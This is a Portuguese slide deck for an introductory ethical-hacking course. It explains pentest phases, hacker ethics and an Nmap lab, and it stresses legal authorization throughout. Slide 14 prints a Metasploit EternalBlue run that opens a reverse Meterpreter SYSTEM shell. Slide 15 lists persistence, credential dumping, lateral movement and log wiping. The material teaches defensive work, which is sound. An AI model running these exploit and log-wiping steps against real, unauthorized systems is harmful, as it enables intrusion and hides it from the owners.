SYS.SEC.MOD6.CAP14 // V.1.0
ACCESS:AUTHORIZED
MÓDULO 6: SEGURANÇA DE REDES
CAPÍTULO 14
O Ataque Ético:
Introdução ao Pentest
Aprendendo a pensar como um atacante para defender melhor:
Pentest, Ética Hacker e as Fases de um Teste de Intrusão
INSTRUTOR: [Nome]
FIG
14.0
2.
O que vocêvai aprender
Compreender o que é um Pentest e seu papel estratégico na defesa
proativa de sistemas e redes.
Diferenciar Pentest, Scan de Vulnerabilidade e Red Team através de suas
metodologias e objetivos.
Conhecer a ética do hacker: White Hat (ético), Black Hat (criminoso)
e Grey Hat (zona cinzenta).
Entender as 5 fases de um Pentest profissional baseadas no Cyber Kill
Chain.
Realizar um scan de portas básico com Nmap em ambiente controlado
e autorizado.
Conexão com Certificações
Estes conceitos são fundamentais para:
CEH (Certified Ethical Hacker)
OSCP (Offensive Security Certified Professional)
CompTIA Security+
OBJ.LEARNING // CAP.14
3.
Pentest (Teste deIntrusão)
O que é?
Um ataque simulado e autorizado contra sistemas, redes ou
aplicações. Realizado por profissionais para identificar
vulnerabilidades exploráveis antes que atacantes reais o façam.
Analogia: O Inspetor
Imagine contratar um ex-ladrão reformado (consultor) para
tentar invadir sua casa.
Ele testa janelas e portas.
Tenta enganar moradores.
Entrega um relatório: "Entrei pela janela do banheiro."
Objetivo
Validar a eficácia das defesas existentes e fornecer
recomendações práticas. Responde à pergunta: "Um atacante
real conseguiria nos invadir?"
DIFERENCIAL CRÍTICO: Permissão explícita e autorizada. Sem autorização formal, é crime cibernético.
DEF.PENTEST // CAP.14
4.
Diferenças Fundamentais
Tipo Oque é? Analogia Quem Faz? Resultado
Scan de
Vulnerabilidade
Scan automatizado que procura
por vulnerabilidades conhecidas.
"Passar uma lista de checagem
em todas as janelas para ver se
alguma está destrancada."
Analista /
Ferramenta
(Nessus)
Relatório de
vulnerabilidades (ex: "Porta
3389 aberta").
Pentest
Ataque manual e focado que
tenta explorar as vulnerabilidades.
"Tentar ativamente abrir a
janela destrancada e entrar na
casa."
Pentester (Hacker
Ético)
Relatório de exploração e
impacto real.
Red Team
Simulação completa focada em
testar as defesas(pessoas e processos).
"Tentar invadir o castelo por
qualquer meio sem ser pego
pelos guardas."
Equipe de Red
Team
Relatório de eficácia da
defesa (SOC).
COMP.TABLE // CAP.14
5.
Scan de Vulnerabilidade
Oque é?
Varredura automatizada que compara sistemas contra um banco de dados de
vulnerabilidades conhecidas (CVEs). Identifica fraquezas, mas não as explora.
Como funciona?
Envia requisições aos sistemas-alvo
Compara respostas com assinaturas (CVE)
Gera relatório classificado por severidade
LIMITAÇÃO CRÍTICA
O scan diz "esta janela pode estar destrancada", mas não tenta abri-la. Pode gerar
falsos positivos e não valida o impacto real.
FIG 14.2: FERRAMENTAS DE SCAN
Ferramentas Típicas
Nessus OpenVAS
Qualys Rapid7
> SCAN COMPLETE
> [CRITICAL] CVE-2021-44228 (Log4j)
> [HIGH] Outdated Apache 2.4.49
> [MEDIUM] SSL Certificate Expired
SYS.SCAN.VULN // CAP.14
6.
Red Team -Simulação Completa
O que é?
Operação ofensiva que simula um adversário real (APT)
tentando comprometer a organização por qualquer meio
necessário. Sem limitações artificiais de escopo.
Diferença do Pentest:
Enquanto o Pentest foca em encontrar vulnerabilidades técnicas,
o Red Team foca em testar a eficácia da defesa de forma holística
e furtiva.
Adversário:O Blue Team (SOC) geralmente não sabe que o exercício está
acontecendo, tornando o teste realista.
Foco: Testar Defesas
Tecnologia: Firewalls, IDS/IPS, SIEM detectam?
Processos: O SOC segue os playbooks?
Pessoas: Usuários caem em phishing?
MTTD
Mean Time To Detect
MTTR
Mean Time To Respond
OP.RED.TEAM // CAP.14
7.
A Ética doHacker: Os "Chapéus"
O termo "hacker" descreve alguém com curiosidade técnica. A diferença entre o profissional ético e o
criminoso não está na habilidade técnica, mas na INTENÇÃO e na PERMISSÃO.
White Hat
O Ético
Tem permissão explícita.
Objetivo: Proteger.
Grey Hat
O Meio-Termo
Sem permissão (Ilegal).
Sem intenção maliciosa.
Black Hat
O Criminoso
Sem permissão.
Intenção maliciosa.
ETHICS.CLASS // CAP.14
8.
White Hat (ChapéuBranco)
Permissão
O White Hat sempre opera com
autorização formal.
Contrato assinado
Escopo definido
Regras de engajamento
Objetivo
O propósito é melhorar a segurança e
trabalhar com a organização.
Encontrar falhas
Documentar riscos
Recomendar correções
Ética
Segue códigos de ética profissionais
rigorosos.
Confidencialidade: Não vazar dados.
Integridade: Não causar danos.
Legalidade: Respeitar leis.
Exemplos
Pentester Profissional, Pesquisador de Segurança, Bug Bounty Hunter.
Contexto Profissional
Carreira legítima e valorizada. Envolve "Responsible Disclosure"
(divulgação responsável).
ETHICS.WHITEHAT // CAP.14
9.
Black Hat (ChapéuPreto)
Características
Ataca sem permissão. O Black Hat invade sistemas sem autorização, não
assina contratos e não respeita limites éticos.
Intenção Maliciosa: Age para causar danos, roubar ou extorquir.
Motivações
Lucro: Ransomware, venda de dados.
Espionagem: APTs (Estados-nação).
Sabotagem: Destruição de sistemas.
Atores de Ameaça
Relaciona-se com Script Kiddies, Cibercriminosos Organizados e Insiders
Maliciosos (Módulo 2).
CRITICAL
ALERT
Consequências Legais
Black Hat hacking é crime federal.
Brasil:
Lei 12.737/2012 (Prisão + Multa).
EUA:
CFAA (Até 20 anos de prisão).
Civil:
Processos por danos milionários.
THREAT.BLACKHAT // CAP.14
10.
STATUS: UNAUTHORIZED /AMBIGUOUS
Grey Hat (Chapéu Cinza)
Características
Ataca sem permissão (ILEGAL): Não possui contrato ou
autorização do proprietário.
Sem intenção maliciosa: Não busca causar danos, roubar ou
destruir.
Motivação: Curiosidade técnica, desejo de ajudar ou busca
por reconhecimento.
EXEMPLO CLÁSSICO
"Invade um site, encontra uma falha crítica e avisa o dono... talvez
pedindo uma recompensa depois."
ÉTICA (Intenção) VS LEI (Ação)
O Grey Hat pode argumentar que tinha "boas intenções", mas a
lei não reconhece isso como defesa absoluta.
ZONA CINZENTA: AINDA É CRIME
Acesso não autorizado é crime em muitos países (ex: Lei Carolina
Dieckmann no Brasil, CFAA nos EUA), independentemente da
motivação.
Muitos Grey Hats já foram processados criminalmente.
ETHICS.GREYHAT // CAP.14
11.
As 5 Fasesde um Pentest
Metodologia estruturada baseada no Cyber Kill Chain.
1
Reconhecimento
"Mapeando o terreno".
Coleta de informações
passiva e ativa.
2
Varredura
"Procurando portas".
Scan de portas, serviços
e vulnerabilidades.
3
Exploração
"O Hack". Obtenção de
acesso inicial
explorando falhas.
4
Pós-Exploração
Persistência,
movimentação lateral e
escalação de privilégio.
5
Relatório
A fase mais
importante.
Documentação e
recomendações.
FRAMEWORKS DE REFERÊNCIA: PTES OWASP NIST SP 800-115
PROCESS.FLOW // CAP.14
12.
1 Reconhecimento (Reconnaissance)
Objetivo
Coletaro máximo de informações possível sobre o alvo
(infraestrutura, pessoas, tecnologias) antes de qualquer ação
invasiva.
Analogia
"O ladrão observando a casa antes de invadir: horários, alarmes,
câmeras."
Passivo (OSINT)
Coleta de informações públicas. Sem interação direta. O alvo não
sabe.
Sites corporativos & Redes Sociais
LinkedIn (Funcionários)
Registros DNS / WHOIS
Google Dorking & Shodan
Ativo
Interação direta com o alvo. O alvo pode detectar.
Scan de Portas (Nmap)
Ping Sweep (Hosts ativos)
Traceroute (Caminho de rede)
DNS Enumeration
RESULTADO: Um "mapa" detalhado do alvo: IPs, domínios, tecnologias e vetores de ataque.
PHASE.01.RECON // CAP.14
13.
2. Varredura (Scanning)
Oque procurar
Portas Abertas: Identificar serviços acessíveis (ex: 22/SSH, 80/HTTP).
Serviços e Versões: Qual software está rodando? (ex: Apache 2.4.49).
Vulnerabilidades (CVEs): Falhas conhecidas nas versões detectadas.
Configurações Inseguras: Senhas padrão, criptografia fraca.
Ferramentas Principais
Nmap Nessus
Nikto Masscan
> RESULTADO: MAPA DE SUPERFÍCIE DE ATAQUE
> Lista de alvos priorizados
Diferença: Reconhecimento pergunta "Quem existe?". Varredura
pergunta "Onde posso entrar?".
PHASE.02.SCAN // CAP.14
14.
3 Obtenção deAcesso (Exploitation)
O momento em que a vulnerabilidade identificada é explorada para contornar controles de segurança e ganhar
acesso não autorizado ao sistema.
Exploração de Software
Buffer Overflows, Remote Code Execution (RCE) em serviços
desatualizados.
Ataques Web
SQL Injection (banco de dados), XSS, Injeção de Comandos.
Ataques de Credencial
Brute Force (força bruta), Credential Stuffing, Password Spraying.
msf6 >use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010) >set RHOSTS 192.168.1.105
msf6 exploit(ms17_010) >exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.105:445 - Connecting to target...
[+] 192.168.1.105:445 - Target is vulnerable.
[*] Sending stage (200262 bytes) to 192.168.1.105
[+] Meterpreter session 1 opened
meterpreter >getuid
Server username: NT AUTHORITYSYSTEM
FERRAMENTAS DO ARSENAL: Metasploit Framework Burp Suite Hydra SQLMap PHASE.03.EXPLOIT // CAP.14
15.
4 Pós-Exploração
O acessoinicial é apenas o começo. O objetivo agora é expandir o controle e garantir o retorno.
Escalação de Privilégio
"Sair do usuário comum para o
Administrador/Root."
Kernel Exploits
Misconfigurations
Weak Permissions
Credential Dumping
Persistência
"Garantir que o acesso permaneça mesmo
após reinicialização."
Backdoors / Trojans
Scheduled Tasks
Registry Keys
New User Accounts
Movimentação Lateral
"Pular de uma máquina para outra em
busca do alvo principal."
Pass-the-Hash
SSH Keys
RDP / SMB
Internal Scanning
TAREFA FINAL: Limpeza de Rastros (Apagar logs, remover ferramentas). OBJETIVO: DOMÍNIO TOTAL
PHASE.04.POST // CAP.14
16.
5 Relatório (Reporting)
"Senão está documentado, não aconteceu."
A fase mais crítica para o valor do negócio.
Sumário Executivo
Para: C-Level, Diretores, Gestores.
Linguagem de Negócios: Sem "technobabble".
Risco Real: Impacto financeiro e reputacional.
Nível de Risco: Alto, Médio, Baixo (Gráficos).
Relatório Técnico
Para: SysAdmins, Devs, Equipe de Segurança.
Detalhes da Falha: CVEs, versões, logs.
PoC (Proof of Concept): Evidências e prints.
Remediação: Passo a passo para corrigir.
OBJETIVO FINAL: Não é apenas "quebrar", é fornecer o roteiro para CORRIGIR.
PHASE.05.REPORT // CAP.14
17.
Laboratório Guiado: Nmap
Objetivo
Investigarum alvo autorizado para identificar portas abertas,
serviços em execução e possíveis vulnerabilidades.
Ferramentas
Terminal Nmap
AVISO LEGAL CRÍTICO
JAMAIS execute scans em redes ou IPs sem permissão explícita
por escrito. Para este laboratório, use apenas o alvo de teste
fornecido ou sua própria rede local.
Fluxo de Execução
1 Verificar conectividade (Ping)
2 Executar Scan Básico (Nmap)
3 Analisar Portas e Serviços
LAB.NMAP.INTRO // CAP.14
18.
Laboratório Guiado: Execução
Noseu terminal, digite o comando abaixo e pressione ENTER:
aluno@kali:~$ nmap -sV 192.168.0.105
nmap
O comando que chama a
ferramenta.
-sV
Service Version: Pede para
identificar versões dos softwares.
IP
O endereço do alvo (Substitua
pelo IP do seu laboratório).
STATUS: INICIANDO VARREDURA...
LAB.EXECUTION // CAP.14
19.
Analisando os Resultados
PORTSTATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
PORT (Porta)
O número da porta e o protocolo (TCP/UDP). É a "porta de
entrada".
STATE (Estado)
open: Aceita conexões (Perigo!).
closed: Recusa conexões.
filtered: Firewall está bloqueando.
VERSION (Versão)
A informação mais valiosa. Identifica o software exato (ex: vsftpd
2.3.4).
O PULO DO GATO: Hackers pegam a VERSÃO e buscam no
Google: "vsftpd 2.3.4 exploit". Se houver falha conhecida, o
ataque começa.
LAB.ANALYSIS // CAP.14
20.
Resumo e Reflexão
Recapitulando
Pentesté Defesa: Usar técnicas de ataque para encontrar
falhas antes dos criminosos.
Ética é a Chave: A diferença entre White Hat e Black Hat é a
permissão.
Metodologia: Seguir as 5 fases (Recon, Scan, Exploit, Post,
Report) garante profissionalismo.
Valor Real: O relatório e a remediação são mais importantes
que o "hack" em si.
Desafio Rápido
Qual é a principal diferença técnica entre um Scan de
Vulnerabilidade e um Pentest?
A) O Pentest é sempre automatizado.
B) O Scan identifica, o Pentest explora.
C) O Pentest não precisa de contrato.
D) O Scan é ilegal sem permissão.
Resposta Correta: B. O Scan apenas aponta a porta aberta; o Pentest
tenta entrar por ela para validar o impacto real.
END.MODULE.06 // CAP.14